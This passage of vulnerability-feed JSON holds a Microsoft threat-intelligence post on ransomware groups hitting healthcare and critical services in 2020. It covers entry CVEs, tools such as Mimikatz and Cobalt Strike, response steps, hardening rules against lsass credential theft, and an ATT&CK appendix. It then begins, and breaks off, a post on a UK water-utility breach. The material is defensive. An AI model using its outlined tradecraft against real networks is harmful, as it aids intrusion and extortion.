"description": "At a time when remote work is becoming universal and the strain on SecOps, especially in healthcare and critical industries, has never been higher, ransomware actors are unrelenting, continuing their normal operations.\n\nMultiple ransomware groups that have been accumulating access and maintaining persistence on target networks for several months activated dozens of ransomware 
deployments in the first two weeks of April 2020. So far the attacks have affected aid organizations, medical billing companies, manufacturing, transport, government institutions, and educational software providers, showing that these ransomware groups give little regard to the critical services they impact, global crisis notwithstanding. These attacks, however, are not limited to critical services, so organizations should be vigilant for signs of compromise.\n\nThe ransomware deployments in this two-week period appear to cause a slight uptick in the volume of ransomware attacks. However, Microsoft security intelligence as well as forensic data from relevant incident response engagements by Microsoft Detection and Response Team (DART) showed that many of the compromises that enabled these attacks occurred earlier. Using an attack pattern typical of [human-operated ransomware](<https://aka.ms/human-operated-ransomware>) campaigns, attackers have compromised target networks for several months beginning earlier this year and have been waiting to monetize their attacks by deploying ransomware when they would see the most financial gain.\n\nMany of these attacks started with the exploitation of vulnerable internet-facing network devices; others used brute force to compromise RDP servers. The attacks delivered a wide range of payloads, but they all used the same techniques observed in human-operated ransomware campaigns: credential theft and lateral movement, culminating in the deployment of a ransomware payload of the attacker\u2019s choice. Because the ransomware infections are at the tail end of protracted attacks, defenders should focus on hunting for signs of adversaries performing credential theft and lateral movement activities to prevent the deployment of ransomware.\n\nIn this blog, we share our in-depth analysis of these ransomware campaigns. 
Below, we will cover:\n\n * Vulnerable and unmonitored internet-facing systems provide easy access to human-operated attacks\n * A motley crew of ransomware payloads\n * Immediate response actions for active attacks\n * Building security hygiene to defend networks against human-operated ransomware\n * Microsoft Threat Protection: Coordinated defense against complex and wide-reaching human-operated ransomware\n\nWe have included additional technical details including hunting guidance and recommended prioritization for security operations (SecOps).\n\n## Vulnerable and unmonitored internet-facing systems provide easy access to human-operated attacks\n\nWhile the recent attacks deployed various ransomware strains, many of the campaigns shared infrastructure with previous ransomware campaigns and used the same techniques commonly observed in human-operated ransomware attacks.\n\nIn stark contrast to attacks that deliver ransomware via email\u2014which tend to unfold much faster, with ransomware deployed within an hour of initial entry\u2014the attacks we saw in April are similar to the Doppelpaymer ransomware campaigns from 2019, where attackers gained access to affected networks months in advance. 
They then remained relatively dormant within environments until they identified an opportune time to deploy ransomware.\n\nTo gain access to target networks, the recent ransomware campaigns exploited internet-facing systems with the following weaknesses:\n\n * Remote Desktop Protocol (RDP) or Virtual Desktop endpoints without multi-factor authentication (MFA)\n * Older platforms that have reached end of support and are no longer getting security updates, such as Windows Server 2003 and Windows Server 2008, exacerbated by the use of weak passwords\n * Misconfigured web servers, including IIS, electronic health record (EHR) software, backup servers, or systems management servers\n * Citrix Application Delivery Controller (ADC) systems affected by [CVE-2019-19781](<https://support.citrix.com/article/CTX267027>)\n * Pulse Secure VPN systems affected by [CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>)\n\nApplying security patches for internet-facing systems is critical in preventing these attacks. It\u2019s also important to note that, although Microsoft security researchers have not observed the recent attacks exploiting the following vulnerabilities, historical signals indicate that these campaigns may eventually exploit them to gain access, so they are worth reviewing: [CVE-2019-0604](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0604>), [CVE-2020-0688](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0688>), [CVE-2020-10189](<https://nvd.nist.gov/vuln/detail/CVE-2020-10189>).\n\nLike many breaches, attackers employed credential theft, lateral movement capabilities using common tools, including Mimikatz and Cobalt Strike, network reconnaissance, and data exfiltration. In these specific campaigns, the operators gained access to highly privileged administrator credentials and were ready to take potentially more destructive action if disturbed. 
On networks where attackers deployed ransomware, they deliberately maintained their presence on some endpoints, intending to reinitiate malicious activity after ransom is paid or systems are rebuilt. In addition, while only a few of these groups gained notoriety for selling data, almost all of them were observed viewing and exfiltrating data during these attacks, even if they have not advertised or sold yet.\n\nAs with all human-operated ransomware campaigns, these recent attacks spread throughout an environment affecting email identities, endpoints, inboxes, applications, and more. Because it can be challenging even for experts to ensure complete removal of attackers from a fully compromised network, it\u2019s critical that vulnerable internet-facing systems are proactively patched and mitigations put in place to reduce the risk from these kinds of attacks.\n\n## A motley crew of ransomware payloads\n\nWhile individual campaigns and ransomware families exhibited distinct attributes as described in the sections below, these human-operated ransomware campaigns tended to be variations on a common attack pattern. They unfolded in similar ways and employed generally the same attack techniques. Ultimately, the specific ransomware payload at the end of each attack chain was almost solely a stylistic choice made by the attackers.\n\n\n\n### RobbinHood ransomware\n\nRobbinHood ransomware operators gained some attention for [exploiting vulnerable drivers](<https://www.microsoft.com/security/blog/2020/03/17/secured-core-pcs-a-brief-showcase-of-chip-to-cloud-security-against-kernel-attacks/>) late in their attack chain to turn off security software. However, like many other human-operated ransomware campaigns, they typically start with an RDP brute-force attack against an exposed asset. They eventually obtain privileged credentials, mostly local administrator accounts with shared or common passwords, and service accounts with domain admin privileges. 
RobbinHood operators, like Ryuk and other well-publicized ransomware groups, leave behind new local and Active Directory user accounts, so they can regain access after their malware and tools have been removed.\n\n### Vatet loader\n\nAttackers often shift infrastructure, techniques, and tools to avoid notoriety that might attract law enforcement or security researchers. They often retain them while waiting for security organizations to start considering associated artifacts inactive, so they face less scrutiny. Vatet, a custom loader for the Cobalt Strike framework that has been seen in ransomware campaigns as early as November 2018, is one of the tools that has resurfaced in the recent campaigns.\n\nThe group behind this tool appears to be particularly intent on targeting hospitals, as well as aid organizations, insulin providers, medical device manufacturers, and other critical verticals. They are one of the most prolific ransomware operators during this time and have caused dozens of cases.\n\nUsing Vatet and Cobalt Strike, the group has delivered various ransomware payloads. More recently, they have been deploying in-memory ransomware that utilizes Alternate Data Streams (ADS) and displays simplistic ransom notes copied from older ransomware families. To access target networks, they exploit [CVE-2019-19781](<https://support.citrix.com/article/CTX267027>), brute force RDP endpoints, and send email containing .lnk files that launch malicious PowerShell commands. Once inside a network, they steal credentials, including those stored in the Credential Manager vault, and move laterally until they gain domain admin privileges. The group has been observed exfiltrating data prior to deploying ransomware.\n\n### NetWalker ransomware\n\nNetWalker campaign operators gained notoriety for targeting hospitals and healthcare providers with emails claiming to provide information about COVID-19. 
These emails also delivered NetWalker ransomware directly as a .vbs attachment, a technique that has gained media attention. However, the campaign operators also compromised networks using misconfigured IIS-based applications to launch Mimikatz and steal credentials, which they then used to launch PsExec, and eventually deploying the same NetWalker ransomware.\n\n### PonyFinal ransomware\n\nThis Java-based ransomware had been considered a novelty, but the campaigns deploying PonyFinal weren\u2019t unusual. Campaign operators compromised internet-facing web systems and obtained privileged credentials. To establish persistence, they used PowerShell commands to launch the system tool mshta.exe and set up a reverse shell based on a common PowerShell attack framework. They also used legitimate tools, such as Splashtop, to maintain remote desktop connections.\n\n### Maze ransomware\n\nOne of the first ransomware campaigns to make headlines for selling stolen data, Maze continues to target technology providers and public services. Maze has a history of going after managed service providers (MSPs) to gain access to the data and networks of MSP customers.\n\nMaze has been delivered via email, but campaign operators have also deployed Maze to networks after gaining access using common vectors, such as RDP brute force. Once inside a network, they perform credential theft, move laterally to access resources and exfiltrate data, and then deploy ransomware.\n\nIn a recent campaign, Microsoft security researchers tracked Maze operators establishing access through an internet-facing system by performing RDP brute force against the local administrator account. 
Using the brute-forced password, campaign operators were able to move laterally because built-in administrator accounts on other endpoints used the same passwords.\n\nAfter gaining control over a domain admin account through credential theft, campaign operators used Cobalt Strike, PsExec, and a plethora of other tools to deploy various payloads and access data. They established fileless persistence using scheduled tasks and services that launched PowerShell-based remote shells. They also turned on Windows Remote Management for persistent control using stolen domain admin privileges. To weaken security controls in preparation for ransomware deployment, they manipulated various settings through Group Policy.\n\n### REvil ransomware\n\nPossibly the first ransomware group to take advantage of the network device vulnerabilities in Pulse VPN to steal credentials to access networks, REvil (also called Sodinokibi) gained notoriety for accessing MSPs and accessing the networks and documents of customers \u2013 and selling access to both. They kept up this activity during the COVID-19 crisis, targeting MSPs and other targets like local governments. 
REvil attacks are differentiated in their uptake of new vulnerabilities, but their techniques overlap with many other groups, relying on credential theft tools like Mimikatz once in the network and performing lateral movement and reconnaissance with tools like PsExec.\n\n### Other ransomware families\n\nOther ransomware families used in human-operated campaigns during this period include:\n\n * Paradise, which used to be distributed directly via email but is now used in human-operated ransomware attacks\n * RagnarLocker, which is deployed by a group that heavily uses RDP and Cobalt Strike with stolen credentials\n * MedusaLocker, which is possibly deployed via existing Trickbot infections\n * LockBit, which is distributed by operators that use the publicly available penetration testing tool CrackMapExec to move laterally\n\n## Immediate response actions for active attacks\n\nWe highly recommend that organizations immediately check if they have any alerts related to these ransomware attacks and prioritize investigation and remediation. 
Malicious behaviors relevant to these attacks that defenders should pay attention to include:\n\n * Malicious PowerShell, Cobalt Strike, and other penetration-testing tools that can allow attacks to blend in as benign red team activities\n * Credential theft activities, such as suspicious access to Local Security Authority Subsystem Service (LSASS) or suspicious registry modifications, which can indicate new attacker payloads and tools for stealing credentials\n * Any tampering with a security event log, forensic artifact such as the USNJournal, or a security agent, which attackers do to evade detections and to erase chances of recovering data\n\nCustomers using [Microsoft Defender Advanced Threat Protection (ATP)](<https://www.microsoft.com/en-us/microsoft-365/windows/microsoft-defender-atp>) can consult a companion [threat analytics](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/threat-analytics>) report for more details on relevant alerts, as well as advanced hunting queries. Customers subscribed to the [Microsoft Threat Experts](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/microsoft-threat-experts>) service can also refer to the [targeted attack notification](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/microsoft-threat-experts#targeted-attack-notification>), which has detailed timelines of attacks, recommended mitigation steps for disrupting attacks, and remediation advice.\n\nIf your network is affected, perform the following scoping and investigation activities immediately to understand the impact of this breach. 
Using indicators of compromise (IOCs) alone to determine impact from these threats is not a durable solution, as most of these ransomware campaigns employ \u201cone-time use\u201d infrastructure for campaigns, and often change their tools and systems once they determine the detection capabilities of their targets. Detections and mitigations should concentrate on holistic behavioral based hunting where possible, and hardening infrastructure weaknesses favored by these attackers as soon as possible.\n\n### Investigate affected endpoints and credentials\n\nInvestigate endpoints affected by these attacks and identify all the credentials present on those endpoints. Assume that these credentials were available to attackers and that all associated accounts are compromised. Note that attackers can not only dump credentials for accounts that have logged on to interactive or RDP sessions, but can also dump cached credentials and passwords for service accounts and scheduled tasks that are stored in the LSA Secrets section of the registry.\n\n * For endpoints onboarded to [Microsoft Defender ATP](<https://www.microsoft.com/en-us/microsoft-365/windows/microsoft-defender-atp>), use advanced hunting to identify accounts that have logged on to affected endpoints. The threat analytics report contains a hunting query for this purpose.\n * Otherwise, check the Windows Event Log for post-compromise logons\u2014those that occur after or during the earliest suspected breach activity\u2014with event ID 4624 and logon type 2 or 10. For any other timeframe, check for logon type 4 or 5.\n\n### Isolate compromised endpoints\n\nIsolate endpoints that have command-and-control beacons or have been lateral movement targets. Locate these endpoints using advanced hunting queries or other methods of directly searching for related IOCs. 
[Isolate machines](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/respond-machine-alerts#isolate-machines-from-the-network>) using Microsoft Defender ATP, or use other data sources, such as NetFlow, and search through your SIEM or other centralized event management solutions. Look for lateral movement from known affected endpoints.\n\n### Address internet-facing weaknesses\n\nIdentify perimeter systems that attackers might have utilized to access your network. You can use a public scanning interface, such as [_shodan.io_](<https://www.shodan.io/>), to augment your own data. Systems that should be considered of interest to attackers include:\n\n * RDP or Virtual Desktop endpoints without MFA\n * Citrix ADC systems affected by CVE-2019-19781\n * Pulse Secure VPN systems affected by CVE-2019-11510\n * Microsoft SharePoint servers affected by CVE-2019-0604\n * Microsoft Exchange servers affected by CVE-2020-0688\n * Zoho ManageEngine systems affected by CVE-2020-10189\n\nTo further reduce organizational exposure, Microsoft Defender ATP customers can use the [Threat and Vulnerability Management (TVM)](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/next-gen-threat-and-vuln-mgt>) capability to discover, prioritize, and remediate vulnerabilities and misconfigurations. TVM allows security administrators and IT administrators to collaborate seamlessly to remediate issues.\n\n### Inspect and rebuild devices with related malware infections\n\nMany ransomware operators enter target networks through existing infections of malware like Emotet and Trickbot. These malware families, traditionally considered to be banking trojans, have been used to deliver all kinds of payloads, including persistent implants. Investigate and remediate any known infections and consider them possible vectors for sophisticated human adversaries. 
Ensure that you check for exposed credentials, additional payloads, and lateral movement prior to rebuilding affected endpoints or resetting passwords.\n\n## Building security hygiene to defend networks against human-operated ransomware\n\nAs ransomware operators continue to compromise new targets, defenders should proactively assess risk using all available tools. You should continue to enforce proven preventive solutions\u2014credential hygiene, minimal privileges, and host firewalls\u2014to stymie these attacks, which have been consistently observed taking advantage of security hygiene issues and over-privileged credentials.\n\nApply these measures to make your network more resilient against new breaches, reactivation of dormant implants, or lateral movement:\n\n * Randomize local administrator passwords using a tool such as LAPS.\n * Apply [Account Lockout Policy](<https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/account-lockout-policy>).\n * Ensure good perimeter security by patching exposed systems. Apply mitigating factors, such as MFA or vendor-supplied mitigation guidance, for vulnerabilities.\n * Utilize [host firewalls to limit lateral movement](<https://support.microsoft.com/en-us/help/3185535/preventing-smb-traffic-from-lateral-connections>). Preventing endpoints from communicating on TCP port 445 for SMB will have limited negative impact on most networks, but can significantly disrupt adversary activities.\n * Turn on cloud-delivered protection for Microsoft Defender Antivirus or the equivalent for your antivirus product to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a huge majority of new and unknown variants.\n * Follow standard guidance in the [security baselines](<https://techcommunity.microsoft.com/t5/microsoft-security-baselines/bg-p/Microsoft-Security-Baselines>) for Office and Office 365 and the Windows security baselines. 
Use [Microsoft Secure Score](<https://docs.microsoft.com/en-us/microsoft-365/security/mtp/microsoft-secure-score-preview>) assessments to measure security posture and get recommended improvement actions, guidance, and control.\n * Turn on [tamper protection](<https://techcommunity.microsoft.com/t5/Microsoft-Defender-ATP/Tamper-protection-now-generally-available-for-Microsoft-Defender/ba-p/911482>) features to prevent attackers from stopping security services.\n * Turn on [attack surface reduction rules](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction>), including rules that can block ransomware activity: \n * Use advanced protection against ransomware\n * Block process creations originating from PsExec and WMI commands\n * Block credential stealing from the Windows local security authority subsystem (lsass.exe)\n\nFor additional guidance on improving defenses against human-operated ransomware and building better security posture against cyberattacks in general, read [Human-operated ransomware attacks: A preventable disaster](<https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/>).\n\n## Microsoft Threat Protection: Coordinated defense against complex and wide-reaching human-operated ransomware\n\nWhat we\u2019ve learned from the increase in ransomware deployments in April is that attackers pay no attention to the real-world consequences of disruption in services\u2014in this time of global crisis\u2014that their attacks cause.\n\nHuman-operated ransomware attacks represent a different level of threat because adversaries are adept at systems administration and security misconfigurations and can therefore adapt to any path of least resistance they find in a compromised network. If they run into a wall, they try to break through. 
And if they can\u2019t break through a wall, they\u2019ve shown that they can skillfully find other ways to move forward with their attack. As a result, human-operated ransomware attacks are complex and wide-reaching. No two attacks are exactly the same.\n\n[Microsoft Threat Protection (MTP)](<https://www.microsoft.com/en-us/security/technology/threat-protection>) provides coordinated defenses that uncover the complete attack chain and help block sophisticated attacks like human-operated ransomware. MTP combines the capabilities of multiple Microsoft 365 security services to orchestrate protection, prevention, detection, and response across endpoints, email, identities, and apps.\n\nThrough built-in intelligence, automation, and integration, MTP can block attacks, eliminate their persistence, and auto-heal affected assets. It correlates signals and consolidates alerts to help defenders prioritize incidents for investigation and response. MTP also provides a unique cross-domain hunting capability that can further help defenders identify attack sprawl and get org-specific insights for hardening defenses.\n\nMicrosoft Threat Protection is also part of a [chip-to-cloud security approach](<https://www.microsoft.com/security/blog/2020/03/17/secured-core-pcs-a-brief-showcase-of-chip-to-cloud-security-against-kernel-attacks/>) that combines threat defense on the silicon, operating system, and cloud. Hardware-backed security features on Windows 10 like address space layout randomization (ASLR), Control Flow Guard (CFG), and others harden the platform against many advanced threats, including ones that take advantage of vulnerable kernel drivers. These platform security features seamlessly integrate with Microsoft Defender ATP, providing end-to-end security that starts from a strong hardware root of trust. 
On [Secured-core PCs](<https://www.microsoft.com/en-us/windowsforbusiness/windows10-secured-core-computers>) these mitigations are enabled by default.\n\nWe continue to work with our customers, partners, and the research community to track human-operated ransomware and other sophisticated attacks. For dire cases customers can use available services like the [Microsoft Detection and Response (DART) team](<https://www.microsoft.com/security/blog/microsoft-detection-and-response-team-dart-blog-series/>) to help investigate and remediate.\n\n \n\n_Microsoft Threat Protection Intelligence Team_\n\n \n\n## Appendix: MITRE ATT&CK techniques observed\n\nHuman-operated ransomware campaigns employ a broad range of techniques made possible by attacker control over privileged domain accounts. The techniques listed here are techniques commonly used during attacks against healthcare and critical services in April 2020.\n\nCredential access\n\n * [T1003 Credential Dumping](<https://attack.mitre.org/techniques/T1003/>) | Use of LaZagne, Mimikatz, LsaSecretsView, and other credential dumping tools and exploitation of [CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>) on vulnerable endpoints\n\nPersistence\n\n * [T1084 Windows Management Instrumentation Event Subscription](<https://attack.mitre.org/techniques/T1084/>) | WMI event subscription\n * [T1136 Create Account](<https://attack.mitre.org/techniques/T1136/>) | Creation of new accounts for RDP\n\nCommand and control\n\n * [T1043 Commonly Used Port](<https://attack.mitre.org/techniques/T1043/>) | Use of port 443\n\nDiscovery\n\n * [T1033 System Owner/User Discovery](<https://attack.mitre.org/techniques/T1033/>) | Various commands\n * [T1087 Account Discovery](<https://attack.mitre.org/techniques/T1087/>) | LDAP and AD queries and other commands\n * [T1018 Remote System Discovery](<https://attack.mitre.org/techniques/T1018/>) | Pings, qwinsta, and other tools and commands\n * [T1482 Domain Trust 
Discovery](<https://attack.mitre.org/techniques/T1482/>) | Domain trust enumeration using Nltest\n\nExecution\n\n * [T1035 Service Execution](<https://attack.mitre.org/techniques/T1035/>) | Service registered to run CMD (as ComSpec) and PowerShell commands\n\nLateral movement\n\n * [T1076 Remote Desktop Protocol](<https://attack.mitre.org/techniques/T1076/>) | Use of RDP to reach other machines in the network\n * [T1105 Remote File Copy](<https://attack.mitre.org/techniques/T1105/>) | Lateral movement using WMI and PsExec\n\nDefense evasion\n\n * [T1070 Indicator Removal on Host](<https://attack.mitre.org/techniques/T1070/>) | Clearing of event logs using wevutil, removal of USNJournal using fsutil, and deletion of slack space on drive using cipher.exe\n * [T1089 Disabling Security Tools](<https://attack.mitre.org/techniques/T1089/>) | Stopping or tampering with antivirus and other security using ProcessHacker and exploitation of vulnerable software drivers\n\nImpact\n\n * [T1489 Service Stop](<https://attack.mitre.org/techniques/T1489/>) | Stopping of services prior to encryption\n * [T1486 Data Encrypted for Impact](<https://attack.mitre.org/techniques/T1486/>) | Ransomware encryption\n\nThe post [Ransomware groups continue to target healthcare, critical services; here\u2019s how to reduce risk](<https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/>) appeared first on [Microsoft Security.", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-04-28T16:00:49", "type": "mssecure", 
"title": "Ransomware groups continue to target healthcare, critical services; here\u2019s how to reduce risk", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0604", "CVE-2019-11510", "CVE-2019-19781", "CVE-2020-0688", "CVE-2020-10189"], "modified": "2020-04-28T16:00:49", "id": "MSSECURE:E3C8B97294453D962741782EC959E79C", "href": "https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-21T20:03:10", "description": "South Staffordshire PLC, a company that supplies water to over one million customers in the United Kingdom, [notified](<https://www.south-staffs-water.co.uk/news/important-statement>) its customers in August of being a target of a criminal cyberattack. This incident highlights the sophisticated threats that critical industries face today. According to South Staffordshire, the breach did not appear to have caused damage to the systems and it did not impact their ability to supply safe water to their customers.\n\nThe attack brings to light the risk of threat actors gaining access to industrial control system (ICS) environments. 
According to [reports](<https://www.itpro.co.uk/security/ransomware/368808/uk-water-supplier-confirms-hack-by-cl0p-ransomware-gang>), a group associated with the Cl0p ransomware claimed responsibility for the attack, which followed a familiar [extortion model](<https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/#DEV-0537>) wherein attackers extort the target for exfiltrated data without encrypting the organization\u2019s files. After the attack, confidential documents, along with screenshots of the supervisory control and data acquisition (SCADA) system used by water treatment plants were leaked.\n\nAs details of the attack and the vector used to access South Staffordshire PLC\u2019s networks are limited, the Microsoft Defender for IoT research team did further research on techniques used by threat actors in similar attacks. Microsoft researchers have previously observed activity relating to [internet-exposed IoT devices](<https://www.microsoft.com/security/blog/2022/03/16/uncovering-trickbots-use-of-iot-devices-in-command-and-control-infrastructure/>) across different industries, which may be used as a potential foothold into OT networks. Threat actors gain access by deploying malware on information technology (IT) devices and then crossing the boundary to the operational technology (OT) part of the network to target high-value operational assets, or by compromising unmanaged, usually less secure IoT and OT devices.\n\n## IoT devices in critical infrastructure networks\n\nIoT devices offer significant value to organizations and extend beyond environmental monitoring sensors to common office equipment and network devices. However, IoT devices in critical infrastructure networks, if not properly secured, increase the risk of unauthorized access to operational assets and networks. 
Improper configurations such as default credentials and unpatched vulnerabilities are often abused by threat actors to gain network or device access. Once access is established, attackers could identify other assets on the same network, perform reconnaissance, and plan large-scale attacks on sensitive equipment and devices.\n\nIn monitoring threats against critical infrastructure and utilities, Microsoft researchers investigated water utility providers in the United Kingdom with exposed IoT devices within their networks. Using open-source intelligence (OSINT) and Microsoft Defender Threat Intelligence data, the team searched for exposed IoT devices integrated into the networks of water utility providers and found that such facilities were using Draytek Vigor routers, which are intended for home use.\n\nFigure 1. Global mapping of internet-exposed Draytek Vigor devices\n\nWith difficult-to-patch devices such as printers, cameras, routers, and gateway devices overlooked as potential footholds into networks, they are often left exposed. In analyzing Microsoft threat intelligence, Microsoft researchers observed threat actors abusing a known remote code execution vulnerability in Draytek Vigor devices ([CVE-2020-8515](<https://nvd.nist.gov/vuln/detail/CVE-2020-8515>)) to deploy the Mirai botnet. Once attackers establish device access, remote code execution vulnerabilities such as CVE-2020-8515 can then allow attackers to run malicious commands on devices, move laterally within the network, and access other vulnerable devices which were not directly exposed to the internet such as SCADA systems. \n\nIn water treatment applications, SCADA systems allow water plants to monitor levels of specific chemicals and toxins and to collect records of the systems. 
While the attack against South Staffordshire PLC does not appear to have included the abuse of these devices, the release of files pertaining to OT systems constitutes a high-risk to operations and highlights the importance of network segmentation to protect devices and networks from lateral movement.\n\n## Defending critical networks\n\nAttacks on utility providers\u2019 OT networks and devices are high-risk events that can range from data theft to the manipulation of devices controlling the operations. Such events can lead to the interruption of operations, or in severe cases, potential harm to individuals and customers (For example, when [hackers gained access to the water system of one Florida city](<https://www.bbc.com/news/world-us-canada-55989843>) as reported in February 2021).\n\nGiven the severity of these attacks and their potential impact on the utility providers\u2019 operations and even the safety of their customers, it becomes crucial to recognize the importance of proper security practices around IoT & OT unmanaged devices to ensure that such attacks d